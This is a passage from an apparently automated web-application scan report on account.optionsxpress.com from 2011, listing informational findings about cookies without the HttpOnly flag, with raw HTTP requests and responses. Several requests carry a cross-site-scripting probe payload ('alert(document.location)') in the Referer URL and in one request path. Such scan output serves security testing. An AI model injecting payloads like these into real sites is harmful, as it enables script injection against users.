The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, TLTSID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icons/log_in.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 1929
Content-Type: image/gif
Last-Modified: Thu, 06 Nov 2008 19:47:15 GMT
Accept-Ranges: bytes
ETag: "80a3e3774840c91:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=21EAC738463348E4E7697498E4FA20F5; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=21EAC738463348E4E7697498E4FA20F5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a2.&....]...........{........6b|........................P}.U..........................l....................Iv.........................Ly..........z...........z....................................
...[SNIP]...

10.23. https://account.optionsxpress.com/images/logos/firm/newlogo_ox.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/logos/firm/newlogo_ox.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logos/firm/newlogo_ox.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 3698
Content-Type: image/gif
Last-Modified: Thu, 01 Sep 2011 04:00:28 GMT
Accept-Ranges: bytes
ETag: "1f1382af5b68cc1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A07AAAC644F53C5E640E80A0791B83B0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

GIF89a..8..@....q.k.........ZWX....r.M.E#. .........e.^...Y.R.....................@..}.w............... |...............0..P.....`..1-....LIJ?;<...............p........hef........................vstA
...[SNIP]...

10.24. https://account.optionsxpress.com/images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:33:31 GMT; path=/
Set-Cookie: TLTHID=67AC9231459F78416C6C118417F2EB5D; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:31 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

10.25. https://account.optionsxpress.com/images/minus_new_acct.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/minus_new_acct.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/minus_new_acct.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 176
Content-Type: image/gif
Last-Modified: Mon, 20 Jun 2005 14:21:32 GMT
Accept-Ranges: bytes
ETag: "60a375ba375c51:fc8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=82FCEE1D43C306252438F6B0E9A0C596; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=82FCEE1D43C306252438F6B0E9A0C596; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a    .    ....................................................................................................!.......,....    .    .@.-`..$...(FC.V. ..h,....z..D.@T`F....0XF.Iazi.B.;

10.26. https://account.optionsxpress.com/images/newaccount/account_select1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/account_select1.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/newaccount/account_select1.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 19995
Content-Type: image/gif
Last-Modified: Mon, 16 May 2011 14:51:10 GMT
Accept-Ranges: bytes
ETag: "d7b82ab2d813cc1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=74CA95F24DB951FC9D2261975F73498E; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=74CA95F24DB951FC9D2261975F73498E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a........................................................................................................................................................................................}.........
...[SNIP]...

10.27. https://account.optionsxpress.com/images/newaccount/account_select2.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/account_select2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/account_select2.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 8859
Content-Type: image/gif
Last-Modified: Tue, 11 May 2010 17:47:17 GMT
Accept-Ranges: bytes
ETag: "e09b2bff31f1ca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=57018DB34D660B4883F443A4D0B4D349; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:28 GMT

GIF89a............u..x............nK6.......................wnYG.W8..g..|.yZ.vW.......e\......[0.wdQ.........lki.]B..e......ZUN..}.............fG.xh.jI.|^................W<..l.........................
...[SNIP]...

10.28. https://account.optionsxpress.com/images/newaccount/nap_error_icon.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/nap_error_icon.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/nap_error_icon.png HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 385
Content-Type: image/png
Last-Modified: Thu, 28 Oct 2010 18:35:54 GMT
Accept-Ranges: bytes
ETag: "b848a2f4ce76cb1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=2AB1B991426954C9E6064DB17C6FCAD0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

.PNG
.
...IHDR.............Q(......tEXtSoftware.Adobe ImageReadyq.e<...#IDATx.b...?..01@...b....ed......$r..D......P.. . ..z..(S.R
..6>.Y......@z........n....@J.I..P.S&..O..1..'.^........@.@.a:..@
...[SNIP]...

10.29. https://account.optionsxpress.com/images/newaccount/nap_tip_icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/nap_tip_icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/nap_tip_icon.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 329
Content-Type: image/gif
Last-Modified: Tue, 11 May 2010 17:47:16 GMT
Accept-Ranges: bytes
ETag: "70e98fe31f1ca1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=991AE206424B97B6F977F9B28BE347B2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:27 GMT

GIF89a.............f..q..Wy.Vu.W{.T~....W|..........Z..g..X..X.Wx.Vv.......V.}.....e........_..R|...................Ny................................................................................
...[SNIP]...

10.30. https://account.optionsxpress.com/images/openAccount_bottom.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/openAccount_bottom.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/openAccount_bottom.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 892
Content-Type: image/jpeg
Last-Modified: Mon, 10 May 2010 20:56:33 GMT
Accept-Ranges: bytes
ETag: "30977b4583f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky..............Adobe.d.........................#....#"....."'.#!!#.''.030.'>>AA>>AAAAAAAAAAAAAAA................!....!1!!$!!1>-''''->8;333;8AA>>AAAAAAAAAAAAAAAAA...........
...[SNIP]...

10.31. https://account.optionsxpress.com/images/plus_new_acct.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/plus_new_acct.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/plus_new_acct.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 178
Content-Type: image/gif
Last-Modified: Mon, 20 Jun 2005 14:21:17 GMT
Accept-Ranges: bytes
ETag: "b0e14052a375c51:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D7A2A4EA4D6B84512DA39A9BEE64DA2F; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=D7A2A4EA4D6B84512DA39A9BEE64DA2F; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a    .    ....................................................................................................!.......,....    .    .@./`..$...(BB.N. .r1..#4...@T"Q........(....B.J....;

10.32. https://account.optionsxpress.com/images/rightColumn_divider.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/rightColumn_divider.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/rightColumn_divider.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 624
Content-Type: image/jpeg
Last-Modified: Mon, 10 May 2010 20:56:06 GMT
Accept-Ranges: bytes
ETag: "40c45d3583f0ca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8FAC75CE47AFCEB5B19049BC92732706; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=8FAC75CE47AFCEB5B19049BC92732706; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky.......1.....!Adobe.d...........    .......%...n..................................................%$$$%)))))))))).    ..    
   .

........................................##"##))
...[SNIP]...

10.33. https://account.optionsxpress.com/images/styles/bubble/b.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/b.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/b.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 95
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "f0c783bc1bfcca1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=77A51C33434FCC2754ED389A537B984E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a...........f.LLL...ccc.................................!.......,.............Ii...q
.H..;

10.34. https://account.optionsxpress.com/images/styles/bubble/bl.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/bl.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/bl.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 1197
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "50b284bc1bfcca1:fd0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E4CCE9D34E711E38DE7ADA84B79732F8; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a...........f.......MMM...............___YYY...............PPP.i....www.........qqq......}}}TTT....s................~~~JJJ...ccc..............i....u...........z"....{#..2HHH........F....j........
...[SNIP]...

10.35. https://account.optionsxpress.com/images/styles/bubble/br.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/br.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/br.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 366
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "203d84bc1bfcca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=956B761F4FA5D2BDCA16DB89838483FB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a
....1.....f.......ddd..................iii.................................rrr...eee.....................VVV...hhh..^.\.._.W.uN5.c    LLL|V<PPP....a.MMM...........................................
...[SNIP]...

10.36. https://account.optionsxpress.com/images/styles/bubble/l.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/l.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/l.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "f05681bc1bfcca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=66E456154210275BF1AD2294C24E11C3; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a...........f.......!.......,.............'.....;

10.37. https://account.optionsxpress.com/images/styles/bubble/r.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/r.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/r.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
